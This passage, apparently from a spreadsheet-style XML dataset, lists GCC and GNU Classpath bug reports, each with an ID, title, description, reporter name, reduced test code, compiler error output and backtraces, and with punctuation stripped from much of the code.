0x5e66b5 gfc_resolve(gfc_namespace*)
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/fortran/resolve.c:14591
0x5dbd9a gfc_parse_file()
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/fortran/parse.c:4672
0x6199f5 gfc_be_parse_file
	/home/vwe/libs/gcc/test/android-ndk-r9c/src/build/../gcc/gcc-4.8/gcc/fortran/f95-lang.c:188
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
+++++++
The cross compiler was build with
./build/tools/build-gcc.sh  --build-out=/home/vwe/libs/gcc/test/tmp2 --binutils-version=2.22.90 --mpfr-version=3.1.2 --mpc-version=1.0 --gmp-version=5.1.3 --gdb-version=7.7 --cloog-version=0.18.1 --ppl-version=1.1 --isl-version=0.12  --try-64 /home/vwe/libs/gcc/test/android-ndk-r9c/src /home/vwe/libs/gcc/test/android-ndk-r9c arm-linux-androideabi-4.8</t>
  </si>
  <si>
    <t>valeryweber</t>
  </si>
  <si>
    <t>GCC-8953</t>
  </si>
  <si>
    <t>make check gives two unexpected failures and ten unexpected successes</t>
  </si>
  <si>
    <t>make check for libstdc++-v3 fails ...
Release:
gcc-3.2.1
Environment:
Solaris x86 01/04 Release: SunOS brusen 5.8 Generic_108529-16 i86pc i386 i86pc
How-To-Repeat:
Run make check -?</t>
  </si>
  <si>
    <t>koffle</t>
  </si>
  <si>
    <t>GCC-34314</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE on invalid code (with variadic templates): tree check: expected class â€˜typeâ€™ have â€˜exceptionalâ€™ (error_mark) in template_class_depth</t>
  </si>
  <si>
    <t>Compile with -std=c++0x
template
struct call
template
struct call
{
    template
    struct result
    template
    struct result
    {
        typedef X type
    }
}</t>
  </si>
  <si>
    <t>GCC-46472</t>
  </si>
  <si>
    <t>[4.6 Regression] [C++0X] constexpr is not constexpr</t>
  </si>
  <si>
    <t>The code this is reduced from used to compile before the introduction of constexpr.
template struct pair {
        _T1 first
        constexpr pair(){}
}
template
struct array
{
        _Tp _M_instance[_Nm]
}
array 2&gt; ps
b.cc: In constructor â€˜constexpr array 2&gt;::array()â€™:
b.cc:6:8: error: â€˜constexpr pair::pair() [with _T1 = int _T2 = int]â€™ is not â€˜constexprâ€™
b.cc: At global scope:
b.cc:10:26: note: synthesized method â€˜array 2&gt;::array()â€™ first required here</t>
  </si>
  <si>
    <t>GCC-71056</t>
  </si>
  <si>
    <t>[6 Regression] __builtin_bswap32 NEON instruction error with -O3</t>
  </si>
  <si>
    <t>The following code generate a NEON instruction not available error when compiling with `gcc -march=armv7-a -mfloat-abi=hard -mfpu=vfpv3-d16 -O3 -o /dev/null -c a.c` on ARM on gcc 6.1.1 (ArchLinuxARM).
```c
#include 
#include 
extern char *buff
int f2()
struct T1 {
    int32_t reserved[2]
    uint32_t ip
    uint16_t cs
    uint16_t rsrv2
}
void f3(const char *p)
{
    struct T1 x
    memcpy(
    x.reserved[0] = __builtin_bswap32(x.reserved[0])
    x.reserved[1] = __builtin_bswap32(x.reserved[1])
    x.ip = __builtin_bswap32(x.ip)
    x.cs = x.cs &gt; 8
    x.rsrv2 = x.rsrv2 &gt; 8
    if (f2()) {
        memcpy(buff \n 1)
    }
}
```
Error message
```
alarm% gcc -march=armv7-a -mfloat-abi=hard -mfpu=vfpv3-d16 -O3 -o /dev/null -c a.c
a.c: In function â€˜f3â€™:
a.c:16:21: fatal error: You must enable NEON instructions (e.g. -mfloat-abi=softfp -mfpu=neon) to use these intrinsics.
     x.reserved[0] = __builtin_bswap32(x.reserved[0])
                     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
```
Note that `NEON` isn't enabled and there's no direct use of NEON instructions/intrinsics in the code so the NEON instructions must have been added by the optimizer.
Seemingly subtle change can make the error disappear. This includes.
1. -O3 -&gt; -O2 (ok this one is not particularly subtle)
2. Remove any of the byteswap or field
3. Remove any of the memcpy
4. Make the second memcpy unconditional
5. Remove `f2()` (but leave the memcpy condition in some other way)
6. Pass in `x` as argument (either as value or pointer)
The asm generated when compiling with `fpu=neon`
```
f3:
        @ args = 0 pretend = 0 frame = 16
        @ frame_needed = 0 uses_anonymous_args = 0
        mov     r3 r0
        str     lr [sp #-4]!
        sub     sp sp #20
        ldr     r2 [r3 #8]    @ unaligned
        ldr     r1 [r3 #4]    @ unaligned
        mov     ip sp
        ldr     r0 [r0]        @ unaligned
        ldr     r3 [r3 #12]   @ unaligned
        stmia   ip! {r0 r1 r2 r3}
        mov     r3 r2
        ldrh    ip [sp #12]
        rev     r3 r3
        ldrh    r0 [sp #14]
        vldr    d16 [sp]
        lsr     r1 ip #8
        str     r3 [sp #8]
        vrev32.8        d16 d16
        lsr     r2 r0 #8
        orr     r2 r2 r0 lsl #8
        orr     r1 r1 ip lsl #8
        strh    r2 [sp #14]   @ movhi
        strh    r1 [sp #12]   @ movhi
        vstr    d16 [sp]
        bl      f2
        cmp     r0 #0
        movwne  r3 #:lower16:buff
        movtne  r3 #:upper16:buff
        movne   r2 #10
        ldrne   r3 [r3]
        strbne  r2 [r3]
        add     sp sp #20
        @ sp needed
        ldr     pc [sp] #4
        .size   f3 .-f3
        .ident  GCC: (GNU) 6.1.1 20160501
```
And it seems that the NEON instruction it want to generate is `vrev32.8`
The case is simplified from https://github.com/llvm-mirror/llvm/blob/da4b82ab1387da8c959a4e2439bce10b9cefbc8a/tools/llvm-objdump/MachODump.cpp#L8240-L8263
I don't remember seeing this on gcc 5.</t>
  </si>
  <si>
    <t>GCC-67945</t>
  </si>
  <si>
    <t>[6 Regression] Testsuite failures starting with revision 228616</t>
  </si>
  <si>
    <t>Following tests started failing with r228616.
FAIL: gcc.target/powerpc/ppc-pow.c scan-assembler-times bl?[\\\\. ]+pow 1
FAIL: gcc.target/powerpc/ppc-pow.c scan-assembler-times fsqrt 3
FAIL: gcc.target/powerpc/pr46728-2.c scan-assembler-times fsqrt|xssqrtdp 4
FAIL: gcc.target/powerpc/pr46728-3.c scan-assembler-times sqrt 4
FAIL: gcc.target/powerpc/pr46728-5.c scan-assembler-times cbrt 2</t>
  </si>
  <si>
    <t>GCC-8170</t>
  </si>
  <si>
    <t>jni.cc needs stack trace handling</t>
  </si>
  <si>
    <t>Right now we special case the interpreter
in stack traces.  We should also special case
_Jv_JNIMethod::call the same way.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-8257</t>
  </si>
  <si>
    <t>[Alpha] frame pointer computation wrong on alpha (cross-compiler)</t>
  </si>
  <si>
    <t xml:space="preserve">When compiling something to assembly language (-S) with a cross compiler targeted at alpha-unknown-linux(-gnu)? the .frame directive always contains a frame size of 0 even when the frame size is in fact greater than 0.
The same compiler version compiled natively on alpha-linux does produce correct output.
Unfortunately I don't have the opportunity to try hosting the cross compiler on another platform.
Release:
gcc-3.2
Environment:
i386 Linux
How-To-Repeat:
configure --target=alpha-unknown-linux
make
gcc/xgcc -B gcc/ -S -O </t>
  </si>
  <si>
    <t>e9725446</t>
  </si>
  <si>
    <t>GCC-31355</t>
  </si>
  <si>
    <t>--help= option isn't documented.</t>
  </si>
  <si>
    <t>The documentation in invoke.texi for the --help= option only lists the optimizers warnings target and params values that the option can take.  However it can also take a language name as a value and this isn't documented.</t>
  </si>
  <si>
    <t>GCC-70736</t>
  </si>
  <si>
    <t>false positive uninitialized warning</t>
  </si>
  <si>
    <t>This function reproduces the problem yes it looks weird but it's simplified from a less weird function.
I compile it with 'gcc -O2 -Wmaybe-uninitialized'
void *foo(char *)
int main(int argc char **argv)
{
        void *a = argv[0] *b
        if (!a)
                return 0
        do {
                if (a) {
                        b = a
                        a = *argv++
                }
                foo(b)
        } while (b)
        return 0
}
gcc version 5.3.1 20160316 (Debian 5.3.1-12)</t>
  </si>
  <si>
    <t>willy6545</t>
  </si>
  <si>
    <t>GCC-38923</t>
  </si>
  <si>
    <t>symbol versioning disabled due to non-portable sed script</t>
  </si>
  <si>
    <t>libstdc++-v3/configure contains this:
    ldver=`$LD --version 2&gt;/dev/null | head -1 | \
           sed -e 's/GNU \(go\)\{01\}ld \(version \)\{01\}\(([^)]*) \)\{01\}\([0-9.][0-9.]*\).*/\4/'`
that sed script fails with /usr/bin/sed on Solaris disabling symbol versioning.
Here's an example of what I get:
++ /sbcimp/run/pd/binutils/32-bit/2.18/bin/ld --version
++ head -1
++ sed -e 's/GNU ld \(version \)\{01\}\(([^)]*) \)\{01\}\([0-9.][0-9.]*\).*/\3/'
+ ldver='GNU ld (GNU Binutils) 2.18'
++ echo GNU ld '(GNU' 'Binutils)' 2.18
++ nawk -F. '{ if (NF&lt;3) $3=0 print ($1*100+$2)*100+$3 }'
+ glibcxx_gnu_ld_version=1800
This leads to:
configure: WARNING: === Linker version 1800 is too old for 
configure: WARNING: === full symbol versioning support in this release of GCC. 
configure: WARNING: === You would need to upgrade your binutils to version 
configure: WARNING: === 21400 or later and rebuild GCC. 
configure: WARNING: === Symbol versioning will be disabled. 
configure: versioning on shared library symbols is no 
Could be fixed by requiring a POSIX sed or by using awk to select the version (we already require POSIX awk)</t>
  </si>
  <si>
    <t>GCC-1672</t>
  </si>
  <si>
    <t>dynamic_cast gives wrong value under certain circumstances</t>
  </si>
  <si>
    <t>Upcasting and then downcasting (using dynamic_cast) a 
pointer sometimes results in a wrong value.  The simple
attached program demonstrates this.  On my machine that
program resulted in the following output:
B1's constructor:
   this == 0xbffffa00
   pa == 0xbffffa08
   dynamic_cast(pa) == 0xbffffa04
dynamic_cast: dynamic_cast.cc:28: B1::B1(): Assertion `this == dynamic_cast(pa)' failed.
The assertion should not have failed.  It seems that having
this diamond shaped class hierarchy is necessary for this
behaviour to appear.
Release:
gcc version 2.95.3 20001229 (prerelease)
Environment:
i386-linux
How-To-Repeat:
Compile and run the attached source.
  g++ dynamic_cast.ii
is sufficient.  The assertion should not fail but does (on
all the machines I tried).</t>
  </si>
  <si>
    <t>mac</t>
  </si>
  <si>
    <t>GCC-5178</t>
  </si>
  <si>
    <t>Method call on qualified static field doesn't initialize its class</t>
  </si>
  <si>
    <t>The test case below derived from PR375.java crashes because no class initialization for Bar is generated. This occurs when the qualified field name is enclosed in brackets but not otherwise.
In the case which works java_complete_lhs sees a CALL_EXPR and calls patch_method_invocation which sees that the call is qualified and uses cut_identifier_in_qualified to cut the last element off the WFL identifier chain. resolve_qualified_expression_name sets found_decl to a DECL which is wrapped with a class initialization in resolve_field_access.
In the broken case java_complete_lhs sees a EXPR_WITH_FILE_LOCATION and calls resolve_expression_name. resolve_qualified_expression_name sees the CALL_EXPR on the end of the WFL chain (because no cut has occured - but should it be there in the first place?) and ends up in the code for Field access using a primary which seems wrong setting found_decl to a CALL_EXPR which subsquently confuses resolve_field_access into not building a class initialization.
This may also be what causes the problem RTH saw on Alpha with the same test case:
http://gcc.gnu.org/ml/java-patches/2001-q4/msg00501.html
Release:
gcc version 3.1 20011221 (experimental)
How-To-Repeat:
class Bar 
{
  static Integer I = new Integer(1)
}
public class Qual
{
  public static void main(String[] args)
  {
    // System.out.println (Bar.I.toString())  // ok
    System.out.println ((Bar.I).toString())   // crash
  }
}</t>
  </si>
  <si>
    <t>GCC-47034</t>
  </si>
  <si>
    <t>TRANSFER of C_PTR: Components of structure constructor are PRIVATE</t>
  </si>
  <si>
    <t>http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/05c3648efda0dc9b# - and especially http://groups.google.com/group/comp.lang.fortran/msg/7e9e61c22a76f683
James Van Buskirk reports that
   use ISO_C_BINDING 
   type(C_PTR) parameter :: p1 = &amp;
      transfer(32512_C_INTPTR_TC_NULL_PTR)
   integer(C_INTPTR_T) parameter :: n1 = transfer(p10_C_INTPTR_T) 
fails with:
   integer(C_INTPTR_T) parameter :: n1 = transfer(p10_C_INTPTR_T)
                                                   1
Error: Components of structure constructor 'c_ptr' at (1) are PRIVATE
The error is questionable as the first line works w/o error - and as there is no structure constructor involved at all. While the internals are private TRANSFER usually does not care about this.</t>
  </si>
  <si>
    <t>GCC-31680</t>
  </si>
  <si>
    <t>Cannot create DLL with exported stdcall functions because compiler exports the functions without the @N decoration</t>
  </si>
  <si>
    <t>Take the following C test code. I want to make a DLL which exports stdcall HelloWorld function.
test.c:
__attribute__((dllexport)) void __attribute__((__stdcall__)) HelloWorld()
{
}
Compiling &amp; linking it gives the following error during linking with GCC 4.3.0 while it works fine with GCC 3.4.5.
$ i586-mingw32msvc-gcc -c -o test.o test.c
$ i586-mingw32msvc-gcc -shared -o test.dll test.o
Cannot export HelloWorld: symbol not found
collect2: ld returned 1 exit status
Examining the object file seems to reveal the problem especially when compared to the GCC 3.4.5 mingw crosscompiler which is in Debian.
GCC 4.3.0:
$ i586-mingw32msvc-nm test.o | grep HelloWorld
00000000 T _HelloWorld@0
$ strings test.o | grep HelloWorld
 -export:HelloWorld
_HelloWorld@0
GCC 3.4.5:
$ i586-mingw32msvc-nm test.o | grep HelloWorld
00000000 T _HelloWorld@0
$ strings test.o | grep HelloWorld
 -export:HelloWorld@0
_HelloWorld@0
Notice the subtle difference in output of the last command. Between 3.4.5 and 4.3.0 the @0 stdcall decoration in the -export:HelloWorld@0 line got lost which makes it impossible to link DLLs with exported stdcall functions.
Here are some details about the compiler versions used for testing:
$ i586-mingw32msvc-gcc-4.3.0 -v
Using built-in specs.
Target: i586-mingw32msvc
Configured with: ../gcc/configure --prefix=/opt/mingw --target=i586-mingw32msvc --enable-languages=c --disable-multilib --disable-shared --enable-threads=win32 --enable-version-specific-runtime-libs --enable-sjlj-exceptions : (reconfigured) ../gcc/configure --prefix=/opt/mingw --target=i586-mingw32msvc --enable-languages=cc++ --disable-multilib --disable-shared --enable-threads=win32 --enable-version-specific-runtime-libs --enable-sjlj-exceptions
Thread model: win32
gcc version 4.3.0 20070424 (experimental)
$ i586-mingw32msvc-gcc-3.4.5 -v
Reading specs from /usr/lib/gcc/i586-mingw32msvc/3.4.5/specs
Configured with: /build/buildd/mingw32-3.4.5.20060117.1.dfsg/build_dir/src/gcc-3.4.5-20060117-1-dfsg/configure -v --prefix=/usr --target=i586-mingw32msvc --enable-languages=cc++ --enable-threads --enable-sjlj-exceptions --disable-multilib --enable-version-specific-runtime-libs
Thread model: win32
gcc version 3.4.5 (mingw special)</t>
  </si>
  <si>
    <t>tobivollebregt</t>
  </si>
  <si>
    <t>GCC-20160</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] link errors building libgcj tests</t>
  </si>
  <si>
    <t>The libgcj testsuite is failing substantially all tests that require linking
libgcj.a on arm-elf because of missing symbols.
This failure started to occur sometime between 2005/02/13 and 2005/02/16.
There are about 5000 lines of error messages for each link command: the total
testrun log is about 1.5GBytes in size!
/work/rearnsha/gnu/egcs/arm-elf/libjava/testsuite/../../libjava/.libs/libgcj.a(jni.o):
In function `_Jv_JNI_GetAnyMethodID':
/home/rearnsha/gnusrc/egcs-cross/libjava/jni.cc:730: undefined reference to
`java::lang::StringBuffer::StringBuffer(java::lang::String*)'
/home/rearnsha/gnusrc/egcs-cross/libjava/jni.cc:736: undefined reference to
`java::lang::StringBuffer::class$'
/work/rearnsha/gnu/egcs/arm-elf/libjava/testsuite/../../libjava/.libs/libgcj.a(jni.o):
In function `_Jv_JNI_GetAnyMethodID':
/home/rearnsha/gnusrc/egcs-cross/libjava/jni.cc:730: undefined reference to
`java::lang::StringBuffer::StringBuffer(java::lang::String*)'
/home/rearnsha/gnusrc/egcs-cross/libjava/jni.cc:736: undefined reference to
`java::lang::StringBuffer::class$'
/work/rearnsha/gnu/egcs/arm-elf/libjava/testsuite/../../libjava/.libs/libgcj.a(link.o):
In function `_Jv_Linker::find_field(java::lang::Class* java::lang::Class*
_Jv_Utf8Const* _Jv_Utf8Const*)':
/home/rearnsha/gnusrc/egcs-cross/libjava/link.cc:178: undefined reference to
`java::lang::StringBuffer::StringBuffer()'
/home/rearnsha/gnusrc/egcs-cross/libjava/link.cc:202: undefined reference to
`java::lang::StringBuffer::StringBuffer()'
/home/rearnsha/gnusrc/egcs-cross/libjava/link.cc:197: undefined reference to
`java::lang::StringBuffer::class$'
/work/rearnsha/gnu/egcs/arm-elf/libjava/testsuite/../../libjava/.libs/libgcj.a(link.o):
In function `_Jv_Linker::search_method_in_class(java::lang::Class*
java::lang::Class* _Jv_Utf8Const* _Jv_Utf8Const*)':
/home/rearnsha/gnusrc/egcs-cross/libjava/link.cc:471: undefined reference to
`java::lang::StringBuffer::StringBuffer()'
/home/rearnsha/gnusrc/egcs-cross/libjava/link.cc:478: undefined reference to
`java::lang::StringBuffer::class$'
/work/rearnsha/gnu/egcs/arm-elf/libjava/testsuite/../../libjava/.libs/libgcj.a(link.o):
In function `_Jv_GetMethodString(java::lang::Class* _Jv_Method*
java::lang::Class*)':
/home/rearnsha/gnusrc/egcs-cross/libjava/link.cc:684: undefined reference to
`java::lang::StringBuffer::StringBuffer(java::lang::String*)'
etc.</t>
  </si>
  <si>
    <t>GCC-57607</t>
  </si>
  <si>
    <t>g++ cannot distinguish obj-c message call from c++11 lambda</t>
  </si>
  <si>
    <t>The following program (test.mm) has both a lambda and a message call:
    #import 
    #import 
    #import 
    int main()
    {
        [] () { std::cout &lt;&lt; Hello world! &lt;&lt; std::endl }()
        std::cout &lt;&lt; [@Hello world! UTF8String] &lt;&lt; std::endl
        return EXIT_SUCCESS
    }
Compiling with gcc 4.8.1 results in:
    &gt; g++-mp-4.8 -std=c++11 test.mm &amp;&amp; ./a.out
    test.mm: In function 'int main()':
    test.mm:8:6: error: expected identifier before ']' token
         [] () { std::cout &lt;&lt; Hello world! &lt;&lt; std::endl }()
          ^
    test.mm:8:6: error: '' is not an Objective-C class name or
        alias
    test.mm:8:6: error: objective-c++ message argument(s) are expected before
        ']' token
    test.mm:8:11: error: expected '' before '{' token
         [] () { std::cout &lt;&lt; Hello world! &lt;&lt; std::endl }()
               ^
    test.mm:8:57: error: expected primary-expression before ')' token
         [] () { std::cout &lt;&lt; Hello world! &lt;&lt; std::endl }()
                                                             ^
(I know that this wouldn't link but I'm not getting that far). Meanwhile with clang:
    &gt; clang++ -std=c++11 -framework Foundation test.mm &amp;&amp; ./a.out
    Hello world!
    Hello world!
Version information:
    &gt; g++-mp-4.8 --version
    g++-mp-4.8 (MacPorts gcc48 4.8.1_0) 4.8.1
    Copyright (C) 2013 Free Software Foundation Inc.
    This is free software see the source for copying conditions.  There is NO
    warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    &gt; clang++ --version
    Apple clang version 4.0 (tags/Apple/clang-421.0.60) (based on LLVM 3.1svn)
    Target: x86_64-apple-darwin12.4.0
    Thread model: posix
Compiling with -Wall -Wextra makes no difference in the output for either compiler.</t>
  </si>
  <si>
    <t>antonbachin</t>
  </si>
  <si>
    <t>GCC-4552</t>
  </si>
  <si>
    <t>case statement without range causes gcc to quickly eat all memory</t>
  </si>
  <si>
    <t>a case X ... Y where X and Y have either no range or invalid range a gcc subprocess has an argv[0] of garbage and that process consumes memory at an alarming rate.
gcc -c -DVERSION=0.2.5 -fpic -g3  -DDEBUG=0 -DSQLPostgres -pipe -Wall -W -Wpointer-arith -Wbad-function-cast -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wnested-externs -Winline -Wcast-align  -I/usr/local/pgsql/include -I/usr/local/include startup.c
startup.c: In function `parse_options':
startup.c:298: warning: empty range specified
david    25964  0.0  0.1  1468  488 pts/20   S    Oct06   0:00 gcc -c -DVERSION=0.2.5 -fpic -g3 -DDEBUG=0 -DSQLPostgres -pipe -Wall 
david    25965  0.0 84.9 217824 215608 pts/20 R   Oct06   0:03 A@??A@??A@??A@??A@
david    25966  0.0  0.3  2248  988 pts/20   S    Oct06   0:00 as --traditional-format -Qy -o startup.o -
david    26058  0.0  0.3  1764  784 pts/20   S    Oct06   0:00  |       \_ make startup.o
david    26062  0.0  0.2  1472  548 pts/20   S    Oct06   0:00  |           \_ gcc -c -DVERSION=0.2.5 -fpic -g3 -DDEBUG=0 -DSQLPostg
david    26064  0.0  1.3  6344 3468 pts/20   R    Oct06   0:00  |               \_ /home/gccbuild/gcc_auto_build/install/i686-pc-lin
becomes...
david    26064  0.0 87.6 224312 222372 pts/20 D   Oct06   0:03  |               \_ D@0?D@@?D@P?D@`?D@p?D@??D@??D@??D@??D@??D@??D@??D
 switch (c) ... where c is an unsigned integer.
startup.c:298             case o_ADD_USER ... o_OPTIONMAX:
enum {  o_NONE=0 /*skip the lower 256 bits to allow for single char matches*/ 
        o_ADD_USER=1&lt;&lt;8 o_CHECK_CONFIG=1&lt;&lt;9 o_CONVERT_TO_SQL=1&lt;&lt;10
        o_CREATE_LIST=1&lt;&lt;11 o_CREATE_TABLES=1&lt;&lt;12 o_HELP=1&lt;&lt;13
        o_IMPORT_MESSAGE=1&lt;&lt;14 o_INITIALIZE_SQL=1&lt;&lt;15 o_MAINTENANCE=1&lt;&lt;16   
        o_MAKE_DIGESTS=1&lt;&lt;17 o_VERSION=1&lt;&lt;18 o_LISTNAME=1&lt;&lt;19
        o_LISTGROUP=1&lt;&lt;20 o_LIST_VALUES=1&lt;&lt;21
        o_OPTIONMAX=1&lt;&lt;31
}
Release:
/home/gccbuild/gcc_auto_build/install/i686-pc-linux-gnu/lib/gcc-lib/i686-pc-linux-gnu/3.0.2
Environment:
Linux 2.4.10 with GLIBC 2.2.4
How-To-Repeat:
I believe any test case utilizing a bad range will suffice.</t>
  </si>
  <si>
    <t>GCC-77496</t>
  </si>
  <si>
    <t>ICE in instantiate_type at cp/class.c:8270</t>
  </si>
  <si>
    <t>this invalid C++ template creates an ICE:
cat test.cc
template 
class z : x
{
public:
  bool zz (int) { return false }
  int f(bool z) { return zz ? : 0 }
}
class t
{
}
int
main()
{
  z x
  return x.f(0)
}
g++ test.cc
test.cc: In instantiation of 'int z::f(bool) [with x = t]':
test.cc:16:15:   required from here
test.cc:6:29: internal compiler error: in instantiate_type at cp/class.c:8270
   int f(bool z) { return zz ? : 0 }
                          ~~~^~~~~
0x6f9bcf instantiate_type(tree_node* tree_node* int)
	../../gcc-7-20160904/gcc/cp/class.c:8267
0x62eb27 perform_implicit_conversion_flags(tree_node* tree_node* int int)
	../../gcc-7-20160904/gcc/cp/call.c:9763
0x63d0f6 build_conditional_expr_1
	../../gcc-7-20160904/gcc/cp/call.c:4811
0x63ef8c build_conditional_expr(unsigned int tree_node* tree_node* tree_node* int)
	../../gcc-7-20160904/gcc/cp/call.c:5237
0x77cecb build_x_conditional_expr(unsigned int tree_node* tree_node* tree_node* int)
	../../gcc-7-20160904/gcc/cp/typeck.c:6279
0x6a0805 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc-7-20160904/gcc/cp/pt.c:16822
0x695e54 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc-7-20160904/gcc/cp/pt.c:15936
0x6948ed tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc-7-20160904/gcc/cp/pt.c:15238
0x693d48 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc-7-20160904/gcc/cp/pt.c:15419
0x6d64e4 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc-7-20160904/gcc/cp/pt.c:15213
0x6d64e4 instantiate_decl(tree_node* int bool)
	../../gcc-7-20160904/gcc/cp/pt.c:22159
0x6dd29b instantiate_pending_templates(int)
	../../gcc-7-20160904/gcc/cp/pt.c:22276
0x71feaa c_parse_final_cleanups()
	../../gcc-7-20160904/gcc/cp/decl2.c:4617
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-44071</t>
  </si>
  <si>
    <t>ICE with asm goto and __builtin_unreachable()</t>
  </si>
  <si>
    <t>The attached test case ICE's with the __builtin_unreachable() enabled.  With the __builtin_unreachable() disabled it compiles but produces bad code:
        .file   jumptest.c
        .text
        .p2align 415
.globl xyzzy
        .type   xyzzy @function
xyzzy:
.LFB1:
        .cfi_startproc
#APP
# 10 jumptest.c 1
        # Either .L2 or .L3
        jmp .L2
# 0  2
#NO_APP
        movl    $1 %eax      /*** XXX: Instruction skipped by jump ***/
.L2:
        rep
        ret
        .p2align 410
        .p2align 3
.L3:
        xorl    %eax %eax
        cmpl    $6 %edi
        setne   %al
        addl    $1 %eax
        ret
        .cfi_endproc
.LFE1:
        .size   xyzzy .-xyzzy
        .ident  GCC: (GNU) 4.5.0
        .section        .note.GNU-stack@progbits</t>
  </si>
  <si>
    <t>hpa</t>
  </si>
  <si>
    <t>GCC-36450</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in insert_restore/insert_save with GET_MODE_ALIGNMENT mem</t>
  </si>
  <si>
    <t>/there.pentium4/build_i686/staging_dir/usr/bin/i686-linux-uclibc-gcc -c libc/stdlib/strtod.c -o libc/stdlib/strtod.os -include ./include/libc-symbols.h -Wall -Wstrict-prototypes -fno-strict-aliasing -Wnested-externs -Wshadow -Wmissing-noreturn -Wmissing-format-attribute -Wformat=2 -Wmissing-prototypes -Wmissing-declarations -Wnonnull -Wundef -ffunction-sections -fdata-sections -m32 -fno-stack-protector -fno-builtin -nostdinc -I./include -I. -I./libc/sysdeps/linux/i386 --sysroot=/there.pentium4/build_i686/staging_dir/ -isysroot /there.pentium4/build_i686/staging_dir -I=/usr/include -pipe -O3 -ftree-vect-loop-version -ftree-vectorize -fvariable-expansion-in-unroller -funswitch-loops -funroll-all-loops -ftree-loop-distribution -ftree-loop-im -fivopts -fvect-cost-model -fira -I/there.pentium4/build_i686/staging_dir/usr/include -mtune=pentium4 -march=pentium4 -DUCLIBC_INTERNAL -std=gnu99 -Os -funit-at-a-time -fno-tree-loop-optimize -fno-tree-dominator-opts -fno-strength-reduce -fomit-frame-pointer -mpreferred-stack-boundary=2 -falign-functions=1 -falign-jumps=1 -falign-labels=1 -falign-loops=1 -I./libpthread/linuxthreads.old/sysdeps/unix/sysv/linux/i386 -I./libpthread/linuxthreads.old/sysdeps/i386 -I./libpthread/linuxthreads.old/sysdeps/unix/sysv/linux -I./libpthread/linuxthreads.old/sysdeps/pthread -I./libpthread/linuxthreads.old -I./libpthread -I/there.pentium4/toolchain_build_i686/linux/include/ -I/scratch/src/br.update.pentium4/build_i686/staging_dir/usr/bin/../lib/gcc/i686-linux-uclibc/4.4.0//include-fixed -I/scratch/src/br.update.pentium4/build_i686/staging_dir/usr/bin/../lib/gcc/i686-linux-uclibc/4.4.0/include
In file included from libc/stdlib/strtod.c:8:
libc/stdlib/_strtod.c: In function 'strtod':
libc/stdlib/_strtod.c:580: internal compiler error: in insert_restore at caller-save.c:2332</t>
  </si>
  <si>
    <t>CLASSPATH-23930</t>
  </si>
  <si>
    <t>Choice.add freezes the application when called from ActionListener</t>
  </si>
  <si>
    <t>This happens for me with the Gtk+ peers.</t>
  </si>
  <si>
    <t>GCC-66468</t>
  </si>
  <si>
    <t>[6 Regression] ICE in in check_die at dwarf2out.c:5719</t>
  </si>
  <si>
    <t>Created attachment 35721
Source files
Hello.
Starting from Aldy's merge of debug-early branch (r224161) I see following ICE:
c.ii:12:5: internal compiler error: in check_die at dwarf2out.c:5719
     }
     ^
0x809612 check_die
        ../../gcc/dwarf2out.c:5715
0x82bcc0 dwarf2out_decl
        ../../gcc/dwarf2out.c:21886
0x82bcdd dwarf2out_function_decl
        ../../gcc/dwarf2out.c:21894
0x89df28 rest_of_handle_final
        ../../gcc/final.c:4505
0x89e094 execute
        ../../gcc/final.c:4547
Reproduction:
./build.sh
Thanks
Martin</t>
  </si>
  <si>
    <t>GCC-55132</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: g++.dg/tree-ssa/pr45453.C</t>
  </si>
  <si>
    <t>r192964 [1] introduced following failure:
WARNING: program timed out.
FAIL: g++.dg/tree-ssa/pr45453.C -std=gnu++98 (test for excess errors)
UNRESOLVED: g++.dg/tree-ssa/pr45453.C -std=gnu++98  scan-tree-dump-times optimized OBJ_TYPE_REF 1
WARNING: program timed out.
FAIL: g++.dg/tree-ssa/pr45453.C -std=gnu++11 (test for excess errors)
UNRESOLVED: g++.dg/tree-ssa/pr45453.C -std=gnu++11  scan-tree-dump-times optimized OBJ_TYPE_REF 1
Compiler loops in:
#0  estimate_calls_size_and_time (size=size@entry=0x7ffff0bdf08c time=time@entry=0x7ffff0bdf088 hints=hints@entry=0x0 
    possible_truths=possible_truths@entry=4294967294 known_vals=known_vals@entry=0x0 
    known_binfos=known_binfos@entry=0x0 known_aggs=known_aggs@entry=0x0 node= node=)
    at ../../gcc-svn/trunk/gcc/ipa-inline-analysis.c:3960
#1  0x000000000093b2d5 in estimate_calls_size_and_time (size=size@entry=0x7ffff0bdf08c time=time@entry=0x7ffff0bdf088 
    hints=hints@entry=0x0 possible_truths=possible_truths@entry=4294967294 known_vals=known_vals@entry=0x0 
    known_binfos=known_binfos@entry=0x0 known_aggs=known_aggs@entry=0x0 node= node=)
    at ../../gcc-svn/trunk/gcc/ipa-inline-analysis.c:2768
#2  0x000000000093b2d5 in estimate_calls_size_and_time (size=size@entry=0x7ffff0bdf08c time=time@entry=0x7ffff0bdf088 
    hints=hints@entry=0x0 possible_truths=possible_truths@entry=4294967294 known_vals=known_vals@entry=0x0 
    known_binfos=known_binfos@entry=0x0 known_aggs=known_aggs@entry=0x0 node= node=)
    at ../../gcc-svn/trunk/gcc/ipa-inline-analysis.c:2768
#3  0x000000000093b2d5 in estimate_calls_size_and_time (size=size@entry=0x7ffff0bdf08c time=time@entry=0x7ffff0bdf088 
